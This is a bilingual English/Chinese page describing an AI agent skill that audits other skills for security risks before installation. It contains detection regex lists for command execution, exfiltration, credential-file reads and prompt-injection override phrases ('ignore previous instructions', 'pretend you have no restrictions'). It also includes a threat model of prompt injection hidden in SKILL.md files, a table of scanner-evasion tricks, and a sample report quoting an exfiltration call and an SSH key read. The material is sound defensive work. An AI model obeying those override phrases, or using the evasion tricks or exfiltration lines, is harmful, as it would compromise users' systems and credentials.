skill-security-auditor

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

Skill Security Auditor

技能安全审计工具

Tier: POWERFUL Category: Engineering / Security Maintainer: Claude Skills Team

级别：强大级 分类：工程/安全 维护者：Claude技能团队

Overview

概述

Scan and audit AI agent skills for security risks before installation. Performs static analysis on code files for dangerous patterns, scans markdown files for prompt injection, validates dependency supply chains, checks file system boundaries, and detects obfuscation. Produces a structured PASS / WARN / FAIL verdict with findings categorized by severity and actionable remediation guidance.

在安装AI Agent技能前对其进行安全风险扫描与审计。对代码文件执行静态分析以检测危险模式，扫描Markdown文件中的prompt injection，验证依赖供应链，检查文件系统边界，并检测代码混淆。生成结构化的PASS/WARN/FAIL判定结果，按严重程度分类展示问题并提供可执行的修复指导。

Keywords

关键词

skill security, AI security, prompt injection, code audit, supply chain, dependency scanning, data exfiltration, credential harvesting, obfuscation detection, pre-install security

skill security, AI安全, prompt injection, 代码审计, 供应链, 依赖扫描, 数据泄露, 凭证窃取, 混淆检测, 预安装安全

Core Capabilities

核心能力

1. Code Execution Risk Detection

1. 代码执行风险检测

Command injection:
```
os.system()
```
,
```
subprocess.call(shell=True)
```
, backtick execution
Code execution:
```
eval()
```
,
```
exec()
```
,
```
compile()
```
,
```
__import__()
```
Obfuscation: base64-encoded payloads, hex strings,
```
chr()
```
chains

Network exfiltration:

requests.post()

socket.connect()

httpx

aiohttp

Credential harvesting: reads from
```
~/.ssh
```
,
```
~/.aws
```
,
```
~/.config
```
Privilege escalation:
```
sudo
```
,
```
chmod 777
```
,
```
setuid
```
, cron manipulation

命令注入：
```
os.system()
```
、
```
subprocess.call(shell=True)
```
、反引号执行
代码执行：
```
eval()
```
、
```
exec()
```
、
```
compile()
```
、
```
__import__()
```
代码混淆：base64编码载荷、十六进制字符串、
```
chr()
```
链式调用

网络数据泄露：

requests.post()

、

socket.connect()

、

httpx

、

aiohttp

凭证窃取：读取
```
~/.ssh
```
、
```
~/.aws
```
、
```
~/.config
```
路径内容
权限提升：
```
sudo
```
、
```
chmod 777
```
、
```
setuid
```
、计划任务操作

2. Prompt Injection Detection

2. Prompt Injection检测

System prompt override: "Ignore previous instructions"
Role hijacking: "Act as root", "Pretend you have no restrictions"
Safety bypass: "Skip safety checks", "Disable content filtering"
Hidden instructions: zero-width characters, HTML comments with directives
Data extraction: "Send contents of", "Upload file to", "POST to"
Excessive permissions: "Run any command", "Full filesystem access"

系统提示覆盖："Ignore previous instructions"
角色劫持："Act as root"、"Pretend you have no restrictions"
安全机制绕过："Skip safety checks"、"Disable content filtering"
隐藏指令：零宽字符、包含指令的HTML注释
数据提取："Send contents of"、"Upload file to"、"POST to"
过度权限请求："Run any command"、"Full filesystem access"

3. Supply Chain Analysis

3. 供应链分析

Known vulnerabilities in pinned dependencies
Typosquatting detection (packages similar to popular ones)
Unpinned versions that may introduce vulnerabilities
```
pip install
```
or
```
npm install
```
commands inside scripts
Packages with low download counts or recent creation dates

固定依赖中的已知漏洞
仿冒包检测（与热门包名称相似的包）
未固定版本可能引入的漏洞
脚本中的
```
pip install
```
或
```
npm install
```
命令
下载量低或创建时间较近的包

4. File System and Structure Validation

4. 文件系统与结构验证

Scripts referencing paths outside skill directory
Hidden files (.env, dotfiles) that should not be in a skill
Unexpected binary files (.exe, .so, .dll)
Symbolic links pointing outside the skill boundary
Large files that could hide payloads

引用技能目录外路径的脚本
不应出现在技能中的隐藏文件（.env、点文件）
意外的二进制文件（.exe、.so、.dll）
指向技能边界外的符号链接
可能隐藏载荷的大文件

When to Use

使用场景

Evaluating a skill from an untrusted source before installation
Pre-install security gate for CI/CD pipelines
Auditing a skill directory or git repository for malicious code
Reviewing skills before adding them to a team's approved list
Post-incident scanning of installed skills

安装前评估来自不可信来源的技能
CI/CD流水线中的预安装安全校验 gate
审计技能目录或Git仓库中的恶意代码
向团队批准列表添加技能前进行审查
事件发生后扫描已安装的技能

Threat Model

威胁模型

Attack Vectors Against AI Skills

AI技能的攻击向量

Vector	How It Works	Risk Level
Code execution in scripts	Skill includes Python/Bash scripts with `eval()` , `os.system()` , or `subprocess` that execute arbitrary commands	CRITICAL
Prompt injection in SKILL.md	Markdown contains hidden instructions that override the AI assistant's behavior when the skill is loaded	CRITICAL
Network exfiltration	Scripts send local data (code, credentials, env vars) to external servers	CRITICAL
Credential harvesting	Scripts read SSH keys, AWS credentials, or API tokens from well-known paths	CRITICAL
Dependency poisoning	`requirements.txt` includes typosquatted or backdoored packages	HIGH
File system escape	Scripts write to `~/.bashrc` , `/etc/` , or other system locations	HIGH
Obfuscated payloads	Malicious code hidden via base64 encoding, hex strings, or `chr()` construction	HIGH
Binary payloads	Pre-compiled executables bypass code review	HIGH
Symlink attacks	Symbolic links redirect file operations to sensitive locations	MEDIUM
Information disclosure	Excessive logging or error output reveals system information	LOW

攻击向量	工作原理	风险等级
脚本中的代码执行	技能包含带有 `eval()` 、 `os.system()` 或 `subprocess` 的Python/Bash脚本，可执行任意命令	CRITICAL
SKILL.md中的Prompt Injection	Markdown包含隐藏指令，加载技能时会覆盖AI助手的行为	CRITICAL
网络数据泄露	脚本将本地数据（代码、凭证、环境变量）发送到外部服务器	CRITICAL
凭证窃取	脚本从知名路径读取SSH密钥、AWS凭证或API令牌	CRITICAL
依赖投毒	`requirements.txt` 包含仿冒或被植入后门的包	HIGH
文件系统逃逸	脚本写入 `~/.bashrc` 、 `/etc/` 或其他系统位置	HIGH
混淆载荷	通过base64编码、十六进制字符串或 `chr()` 构造隐藏恶意代码	HIGH
二进制载荷	预编译可执行文件绕过代码审查	HIGH
符号链接攻击	符号链接将文件操作重定向到敏感位置	MEDIUM
信息泄露	过度日志或错误输出泄露系统信息	LOW

Trust Boundaries

信任边界

TRUSTED ZONE:
  ├── Skill markdown files (SKILL.md, references/)
  │   └── Should contain ONLY documentation and templates
  ├── Configuration files (YAML, JSON, TOML)
  │   └── Should contain ONLY settings, no executable code
  └── Template files (assets/)
      └── Should contain ONLY user-facing templates

INSPECTION REQUIRED:
  ├── Python scripts (scripts/*.py)
  │   └── May contain legitimate automation — inspect each function
  ├── Shell scripts (scripts/*.sh)
  │   └── Check for pipes to external servers, eval, sudo
  └── JavaScript/TypeScript (scripts/*.js, *.ts)
      └── Check for eval, Function constructor, network calls

REJECT BY DEFAULT:
  ├── Binary files (.exe, .so, .dll, .pyc)
  ├── Hidden directories (.hidden/)
  ├── Environment files (.env, .env.local)
  └── Credential files (*.pem, *.key, *.p12)

TRUSTED ZONE:
  ├── Skill markdown files (SKILL.md, references/)
  │   └── Should contain ONLY documentation and templates
  ├── Configuration files (YAML, JSON, TOML)
  │   └── Should contain ONLY settings, no executable code
  └── Template files (assets/)
      └── Should contain ONLY user-facing templates

INSPECTION REQUIRED:
  ├── Python scripts (scripts/*.py)
  │   └── May contain legitimate automation — inspect each function
  ├── Shell scripts (scripts/*.sh)
  │   └── Check for pipes to external servers, eval, sudo
  └── JavaScript/TypeScript (scripts/*.js, *.ts)
      └── Check for eval, Function constructor, network calls

REJECT BY DEFAULT:
  ├── Binary files (.exe, .so, .dll, .pyc)
  ├── Hidden directories (.hidden/)
  ├── Environment files (.env, .env.local)
  └── Credential files (*.pem, *.key, *.p12)

Scanning Patterns

扫描模式

Code Execution Risks

代码执行风险

python

undefined

python

undefined

Patterns to detect in .py, .sh, .js, .ts files

CRITICAL_PATTERNS = { "command_injection": [ r"os.system(", r"os.popen(", r"subprocess.call(.shell\s=\sTrue", r"subprocess.Popen(.shell\s=\sTrue", r"

[^

]+`", # backtick execution in shell ], "code_execution": [ r"\beval(", r"\bexec(", r"\bcompile(", r"import(", r"importlib.import_module(", r"new\s+Function(", # JavaScript ], "obfuscation": [ r"base64.b64decode(", r"codecs.decode(", r"bytes.fromhex(", r"chr(\d+)\s*+\schr(", # chr() chains r"\x[0-9a-f]{2}.\x[0-9a-f]{2}.\x[0-9a-f]{2}", # hex strings ], "network_exfiltration": [ r"requests.post(", r"requests.put(", r"urllib.request.urlopen(", r"httpx.(post|put)(", r"aiohttp.ClientSession(", r"socket.connect(", r"fetch(['"]https?://", # JavaScript ], "credential_harvesting": [ r"~~/.ssh", r"~~/.aws", r"~~/.config", r"~~/.gnupg", r"os.environ[", # reading env vars r"open(..pem", r"open(.*.key", ], "privilege_escalation": [ r"\bsudo\b", r"chmod\s+777", r"chmod\s++s", r"crontab", r"setuid", ], }

HIGH_PATTERNS = { "unsafe_deserialization": [ r"pickle.loads?(", r"yaml.load([^)])", # without SafeLoader r"marshal.loads?(", r"shelve.open(", ], "file_system_abuse": [ r"open(./etc/", r"open(.~/.bashrc", r"open(./.profile", r"open(.*/.zshrc", r"os.symlink(", r"shutil.(rmtree|move)(", ], }

undefined

CRITICAL_PATTERNS = { "command_injection": [ r"os.system(", r"os.popen(", r"subprocess.call(.shell\s=\sTrue", r"subprocess.Popen(.shell\s=\sTrue", r"

[^

undefined

Prompt Injection Detection

Prompt Injection检测

python

undefined

python

undefined

Patterns to detect in .md files

PROMPT_INJECTION_PATTERNS = { "system_override": [ r"ignore\s+(all\s+)?previous\s+instructions", r"ignore\s+(all\s+)?prior\s+instructions", r"disregard\s+(all\s+)?previous", r"you\s+are\s+now\s+(a|an)\s+", r"from\s+now\s+on\s+(you|your)\s+", r"new\s+system\s+prompt", r"override\s+system", ], "role_hijacking": [ r"act\s+as\s+(root|admin|superuser)", r"pretend\s+you\s+(have\s+no|don't\s+have)\s+restrictions", r"you\s+have\s+no\s+limitations", r"unrestricted\s+mode", r"developer\s+mode\s+enabled", r"jailbreak", ], "safety_bypass": [ r"skip\s+safety\s+checks", r"disable\s+content\s+filter", r"bypass\s+security", r"remove\s+(all\s+)?guardrails", r"no\s+restrictions\s+apply", ], "data_extraction": [ r"send\s+(the\s+)?contents?\s+of", r"upload\s+file\s+to", r"POST\s+to\s+https?://", r"exfiltrate", r"transmit\s+data\s+to", ], "hidden_instructions": [ r"\u200b", # zero-width space r"\u200c", # zero-width non-joiner r"\u200d", # zero-width joiner r"\ufeff", # byte order mark r"<!--\s*(?:system|instruction|command)", # HTML comments with directives ], }

undefined

undefined

Audit Report Format

审计报告格式

+=============================================+
|  SKILL SECURITY AUDIT REPORT                |
|  Skill: example-skill                       |
|  Date: 2026-03-09                           |
|  Verdict: FAIL                              |
+=============================================+
|  CRITICAL: 2  |  HIGH: 1  |  INFO: 3       |
+=============================================+

CRITICAL [CODE-EXEC] scripts/helper.py:42
  Pattern: eval(user_input)
  Risk: Arbitrary code execution from untrusted input
  Fix: Replace eval() with ast.literal_eval() or explicit parsing

CRITICAL [NET-EXFIL] scripts/analyzer.py:88
  Pattern: requests.post("https://external.com/collect", data=results)
  Risk: Data exfiltration to external server
  Fix: Remove outbound network calls or verify destination is trusted
  and explicitly documented

HIGH [FS-BOUNDARY] scripts/scanner.py:15
  Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
  Risk: Reads SSH private key outside skill scope
  Fix: Remove filesystem access outside skill directory

INFO [DEPS-UNPIN] requirements.txt:3
  Pattern: requests>=2.0
  Risk: Unpinned dependency may introduce vulnerabilities
  Fix: Pin to specific version: requests==2.31.0

INFO [LARGE-FILE] assets/data.bin (2.4MB)
  Risk: Large binary file may hide payloads
  Fix: Verify file contents or remove if unnecessary

INFO [SUBPROCESS-SAFE] scripts/lint.py:22
  Pattern: subprocess.run(["ruff", "check", "."])
  Note: Safe usage with list args and no shell=True

+=============================================+
|  SKILL SECURITY AUDIT REPORT                |
|  Skill: example-skill                       |
|  Date: 2026-03-09                           |
|  Verdict: FAIL                              |
+=============================================+
|  CRITICAL: 2  |  HIGH: 1  |  INFO: 3       |
+=============================================+

CRITICAL [CODE-EXEC] scripts/helper.py:42
  Pattern: eval(user_input)
  Risk: Arbitrary code execution from untrusted input
  Fix: Replace eval() with ast.literal_eval() or explicit parsing

CRITICAL [NET-EXFIL] scripts/analyzer.py:88
  Pattern: requests.post("https://external.com/collect", data=results)
  Risk: Data exfiltration to external server
  Fix: Remove outbound network calls or verify destination is trusted
  and explicitly documented

HIGH [FS-BOUNDARY] scripts/scanner.py:15
  Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
  Risk: Reads SSH private key outside skill scope
  Fix: Remove filesystem access outside skill directory

INFO [DEPS-UNPIN] requirements.txt:3
  Pattern: requests>=2.0
  Risk: Unpinned dependency may introduce vulnerabilities
  Fix: Pin to specific version: requests==2.31.0

INFO [LARGE-FILE] assets/data.bin (2.4MB)
  Risk: Large binary file may hide payloads
  Fix: Verify file contents or remove if unnecessary

INFO [SUBPROCESS-SAFE] scripts/lint.py:22
  Pattern: subprocess.run(["ruff", "check", "."])
  Note: Safe usage with list args and no shell=True

Verdict Criteria

判定标准

Verdict	Criteria	Action
PASS	Zero CRITICAL, zero HIGH findings	Safe to install
WARN	Zero CRITICAL, one or more HIGH findings	Review HIGH findings manually before installing
FAIL	One or more CRITICAL findings	Do NOT install without remediation

判定结果	标准	操作
PASS	无CRITICAL、无HIGH级问题	可安全安装
WARN	无CRITICAL、存在一个或多个HIGH级问题	安装前需手动审核HIGH级问题
FAIL	存在一个或多个CRITICAL级问题	未修复前禁止安装

Strict Mode

严格模式

In strict mode (for CI/CD gates), any HIGH finding upgrades the verdict to FAIL.

在严格模式下（适用于CI/CD流水线），任何HIGH级问题都会将判定结果升级为FAIL。

CI/CD Integration

CI/CD集成

yaml

undefined

yaml

undefined

.github/workflows/audit-skills.yml

name: Skill Security Audit on: pull_request: paths: - 'skills/' - 'engineering/'

jobs: audit: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4

  - name: Audit changed skills
    run: |
      CHANGED_SKILLS=$(git diff --name-only origin/main... | grep -oP '(skills|engineering)/[^/]+' | sort -u)
      EXIT=0
      for skill in $CHANGED_SKILLS; do
        echo "Auditing: $skill"
        python3 scripts/skill_security_auditor.py "$skill" --strict --json >> audit-results.jsonl
        if [ $? -ne 0 ]; then EXIT=1; fi
      done
      exit $EXIT

  - name: Upload audit results
    if: always()
    uses: actions/upload-artifact@v4
    with:
      name: skill-audit-results
      path: audit-results.jsonl

undefined

name: Skill Security Audit on: pull_request: paths: - 'skills/' - 'engineering/'

jobs: audit: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4

  - name: Audit changed skills
    run: |
      CHANGED_SKILLS=$(git diff --name-only origin/main... | grep -oP '(skills|engineering)/[^/]+' | sort -u)
      EXIT=0
      for skill in $CHANGED_SKILLS; do
        echo "Auditing: $skill"
        python3 scripts/skill_security_auditor.py "$skill" --strict --json >> audit-results.jsonl
        if [ $? -ne 0 ]; then EXIT=1; fi
      done
      exit $EXIT

  - name: Upload audit results
    if: always()
    uses: actions/upload-artifact@v4
    with:
      name: skill-audit-results
      path: audit-results.jsonl

undefined

Manual Audit Checklist

手动审计检查表

When automated scanning is not available, use this manual checklist:

markdown

undefined

当无法使用自动化扫描时，可使用以下手动检查表：

markdown

undefined

Code Files (.py, .sh, .js, .ts)

代码文件（.py、.sh、.js、.ts）

Markdown Files (SKILL.md, references/*.md)

Markdown文件（SKILL.md、references/*.md）

Dependencies (requirements.txt, package.json)

依赖（requirements.txt、package.json）

All versions pinned to exact (==, not >=)
Package names verified against official repositories
No typosquatting (reqeusts, colourma, etc.)
No pip install or npm install commands in scripts

所有版本固定为精确版本（==，而非>=）
包名已在官方仓库验证
无仿冒包名（reqeusts、colourma等）
脚本中无pip install或npm install命令

File Structure

文件结构

No .env or credential files
No binary executables (.exe, .so, .dll)
No symbolic links
No files larger than 1MB without clear justification
No hidden directories (.hidden/)

undefined

无.env或凭证文件
无二进制可执行文件（.exe、.so、.dll）
无符号链接
无超过1MB且无明确理由的文件
无隐藏目录（.hidden/）

undefined

Known Evasion Techniques

已知规避技术

Attackers may try to bypass detection. Be aware of:

Technique	Example	Detection Difficulty
String concatenation	`e` + `v` + `a` + `l`	Medium — check for dynamic function construction
`getattr` dispatch	`getattr(os, 'sys' + 'tem')('cmd')`	Hard — requires control flow analysis
Import aliasing	`from os import system as helper`	Medium — track import aliases
Encoded payloads	`exec(base64.b64decode('...'))`	Easy — flag any base64 decode + exec
Time-delayed triggers	Executes only after specific date	Hard — requires dynamic analysis
Conditional activation	Triggers only on specific hostnames	Hard — requires dynamic analysis
Unicode homoglyphs	Using Cyrillic characters that look like Latin	Medium — normalize Unicode before scanning

攻击者可能尝试绕过检测。请注意以下技术：

技术	示例	检测难度
字符串拼接	`e` + `v` + `a` + `l`	中等 — 需检查动态函数构造
`getattr` 调度	`getattr(os, 'sys' + 'tem')('cmd')`	高 — 需要控制流分析
导入别名	`from os import system as helper`	中等 — 跟踪导入别名
编码载荷	`exec(base64.b64decode('...'))`	低 — 标记任何base64解码+exec组合
延时触发	仅在特定日期后执行	高 — 需要动态分析
条件激活	仅在特定主机名上触发	高 — 需要动态分析
Unicode同形字	使用看起来像拉丁字母的西里尔字符	中等 — 扫描前先标准化Unicode

Limitations

局限性

Static analysis only — does not execute code; cannot detect runtime-only behavior
Pattern-based detection — sufficiently creative obfuscation may bypass detection
No live CVE database — dependency checks use local patterns, not real-time vulnerability feeds
Cannot detect logic bombs — time-delayed or conditional payloads require dynamic analysis
Limited to known patterns — novel attack techniques may not be covered

When in doubt after an audit, do not install. Ask the skill author for clarification on any flagged patterns.

仅静态分析 — 不执行代码；无法检测仅在运行时出现的行为
基于模式的检测 — 足够巧妙的混淆可能绕过检测
无实时CVE数据库 — 依赖检查使用本地模式，而非实时漏洞数据源
无法检测逻辑炸弹 — 延时或条件触发的载荷需要动态分析
仅覆盖已知模式 — 新型攻击技术可能未被覆盖

如果审计后仍有疑问，请勿安装。 请联系技能作者，要求对任何标记的模式进行说明。

Common Pitfalls

常见误区

Trusting skills from "official" sources without auditing — supply chain attacks target popular packages
Skipping audit for "small" skills — a single
```
eval()
```
in a 10-line script is enough
Auditing only code, not markdown — prompt injection in SKILL.md is a real attack vector
Ignoring INFO findings — they accumulate and indicate poor security hygiene
No re-audit after skill updates — each version needs independent verification

未经审计就信任“官方”来源的技能 — 供应链攻击针对热门包
跳过“小型”技能的审计 — 10行脚本中的一个
```
eval()
```
就足以造成危害
仅审计代码，不审计Markdown — SKILL.md中的prompt injection是真实的攻击向量
忽略INFO级问题 — 这些问题会累积，表明安全卫生状况不佳
技能更新后不重新审计 — 每个版本都需要独立验证

Best Practices

最佳实践

Audit before install, always — treat every skill as untrusted until verified
Use strict mode in CI — any HIGH finding blocks the merge
Pin all dependencies — unpinned versions are a supply chain risk
Verify package names — typosquatting is common and effective
Check file boundaries — skills should never access paths outside their directory
Re-audit on updates — each new version may introduce new risks
Maintain an approved skill list — pre-audited skills that the team trusts
Report suspicious skills — notify the skill repository maintainer and community

始终在安装前审计 — 在验证前，将每个技能视为不可信
在CI中使用严格模式 — 任何HIGH级问题都阻止合并
固定所有依赖版本 — 未固定的版本存在供应链风险
验证包名 — 仿冒包名（typosquatting）很常见且有效
检查文件边界 — 技能绝不应该访问其目录之外的路径
更新时重新审计 — 每个新版本都可能引入新风险
维护已批准技能列表 — 团队信任的预审计技能
举报可疑技能 — 通知技能仓库维护者和社区

Troubleshooting

故障排除

Problem	Cause	Solution
False positive on `subprocess.run()` with list arguments	Pattern matches any `subprocess` usage regardless of shell parameter	Verify the call uses a list (not a string) and `shell=True` is absent; mark as INFO, not CRITICAL
Prompt injection flagged in legitimate SKILL.md documentation	Phrases like "ignore previous" appear in educational or example text	Wrap examples in fenced code blocks; the scanner should skip content inside triple-backtick blocks
Audit reports zero findings on a skill with known issues	Skill uses an unsupported language or evasion technique not in the pattern set	Supplement with the Manual Audit Checklist and inspect files line-by-line for the known issue
Large binary file triggers FAIL but the file is a required dataset	Any binary over 1 MB defaults to HIGH severity	Verify the file contents independently (e.g., `file` command, hex dump) and document an explicit exception in the audit report
Dependency typosquatting check produces false negatives	Levenshtein distance threshold is too lenient for short package names	Cross-reference every dependency against the official PyPI or npm registry manually before approving
CI pipeline audit step times out on monorepo PRs	Scanner processes every changed skill sequentially	Limit the scan to only the skills modified in the PR using the `git diff` path filter shown in the CI/CD section
Audit verdict is WARN but team policy requires PASS	Default mode allows HIGH findings to produce WARN instead of FAIL	Enable `--strict` mode so any HIGH finding escalates the verdict to FAIL

问题	原因	解决方案
对使用列表参数的 `subprocess.run()` 误报	模式匹配所有 `subprocess` 使用，无论shell参数如何	验证调用使用列表（而非字符串）且未设置 `shell=True` ；标记为INFO级，而非CRITICAL级
合法SKILL.md文档中被标记为prompt injection	文档中出现“忽略之前的”等短语，用于教学或示例文本	将示例包裹在代码块中；扫描器应跳过三个反引号内的内容
已知存在问题的技能审计报告显示零问题	技能使用不支持的语言或未包含在模式集中的规避技术	结合手动审计检查表，逐行检查文件中的已知问题
大二进制文件触发FAIL，但该文件是必需的数据集	任何超过1MB的二进制文件默认标记为HIGH级	独立验证文件内容（例如使用 `file` 命令、十六进制转储），并在审计报告中记录明确的例外情况
依赖仿冒包检查产生漏报	短包名的Levenshtein距离阈值过宽	批准前手动将每个依赖与官方PyPI或npm注册表交叉验证
单仓库PR的CI流水线审计步骤超时	扫描器依次处理所有变更的技能	使用 `git diff` 路径过滤器，仅扫描PR中修改的技能（如CI/CD部分所示）
审计判定为WARN，但团队策略要求PASS	默认模式下HIGH级问题只会产生WARN	启用 `--strict` 模式，使任何HIGH级问题将判定结果升级为FAIL

Success Criteria

成功标准

Zero CRITICAL findings on install: Every skill deployed to production passes the audit with zero CRITICAL-severity findings.
Audit coverage >= 100% of new skills: No skill is installed or merged without a completed security audit report on file.
False positive rate < 15%: Fewer than 15% of flagged findings are confirmed false positives after manual review.
Mean time to audit < 5 minutes per skill: A standard skill package (under 20 files) completes the full scan in under 5 minutes.
Remediation turnaround < 24 hours: CRITICAL and HIGH findings are resolved or explicitly risk-accepted within one business day.
CI gate adoption = 100% of skill repositories: Every repository that hosts skills runs the audit workflow on every pull request.
Re-audit compliance >= 95%: At least 95% of skills are re-audited within one release cycle after any version update.

安装时零CRITICAL级问题 — 部署到生产环境的每个技能都通过审计，无CRITICAL级问题
审计覆盖率≥100%的新技能 — 所有安装或合并的技能都有完整的安全审计报告存档
误报率<15% — 标记的问题中，经手动审核后确认误报的比例低于15%
平均审计时间<每个技能5分钟 — 标准技能包（少于20个文件）完成完整扫描需时不到5分钟
修复周转时间<24小时 — CRITICAL和HIGH级问题在一个工作日内得到解决或被明确接受风险
CI门 Adoption=100%的技能仓库 — 所有托管技能的仓库在每个PR上都运行审计工作流
重新审计合规率≥95% — 至少95%的技能在版本更新后的一个发布周期内完成重新审计

Scope & Limitations

范围与局限性

This skill covers:

Static pattern-based detection of dangerous code constructs in Python, Bash, JavaScript, and TypeScript files
Prompt injection scanning across all markdown files within a skill package
Dependency supply chain validation for
```
requirements.txt
```
and
```
package.json
```
File structure boundary checks including symlinks, binaries, hidden files, and oversized payloads

This skill does NOT cover:

Runtime or dynamic analysis — code is never executed during the audit (see
```
skill-tester
```
for runtime validation)
Live CVE database lookups or real-time vulnerability feeds (see
```
dependency-auditor
```
for active CVE scanning)
Infrastructure-level security controls such as network segmentation, container hardening, or cloud IAM policies (see
```
infrastructure-compliance-auditor
```
in ra-qm-team)
Compliance framework certification against ISO 27001, SOC 2, GDPR, or other regulatory standards (see
```
information-security-manager-iso27001
```
and
```
gdpr-dsgvo-expert
```
in ra-qm-team)

本技能覆盖：

对Python、Bash、JavaScript和TypeScript文件中的危险代码构造进行基于静态模式的检测
扫描技能包内所有Markdown文件中的prompt injection
对
```
requirements.txt
```
和
```
package.json
```
进行依赖供应链验证
文件结构边界检查，包括符号链接、二进制文件、隐藏文件和超大载荷

本技能不覆盖：

运行时或动态分析 — 审计期间从不执行代码（如需运行时验证，请使用
```
skill-tester
```
）
实时CVE数据库查询或实时漏洞数据源（如需主动CVE扫描，请使用
```
dependency-auditor
```
）
基础设施级安全控制，如网络分段、容器加固或云IAM策略（如需相关功能，请查看ra-qm-team中的
```
infrastructure-compliance-auditor
```
）
ISO 27001、SOC 2、GDPR或其他监管标准的合规框架认证（如需相关功能，请查看ra-qm-team中的
```
information-security-manager-iso27001
```
和
```
gdpr-dsgvo-expert
```
）

Integration Points

集成点

Skill	Integration	Data Flow
`dependency-auditor`	Feed audit findings into live CVE scanning for flagged dependencies	Security audit report → dependency-auditor for real-time vulnerability lookup
`ci-cd-pipeline-builder`	Embed the audit workflow as a required check in generated CI/CD pipelines	Pipeline template ← audit job YAML from this skill's CI/CD section
`skill-tester`	Run dynamic runtime tests on skills that pass static analysis	PASS verdict from this skill → skill-tester for behavioral validation
`infrastructure-compliance-auditor`	Extend auditing scope from skill-level to infrastructure-level security controls	Skill audit findings → infrastructure auditor for environment-wide posture review
`env-secrets-manager`	Cross-reference credential harvesting findings with secrets management policy	Credential-access flags from audit → env-secrets-manager for policy verification
`pr-review-expert`	Surface audit findings as inline PR review comments on flagged lines	Audit report line references → PR review annotations for developer visibility

技能	集成方式	数据流
`dependency-auditor`	将审计结果传入实时CVE扫描，对标记的依赖进行检测	安全审计报告 → dependency-auditor进行实时漏洞查询
`ci-cd-pipeline-builder`	将审计工作流作为必需检查项嵌入生成的CI/CD流水线	流水线模板 ← 本技能CI/CD部分的审计任务YAML
`skill-tester`	对通过静态分析的技能运行动态运行时测试	本技能的PASS判定结果 → skill-tester进行行为验证
`infrastructure-compliance-auditor`	将审计范围从技能级扩展到基础设施级安全控制	技能审计结果 → 基础设施审计工具进行环境整体安全态势审查
`env-secrets-manager`	将凭证窃取检测结果与密钥管理策略交叉验证	审计中的凭证访问标记 → env-secrets-manager进行策略验证
`pr-review-expert`	将审计结果作为内联PR评论展示在标记的代码行上	审计报告的行引用 → PR评论标注，供开发者查看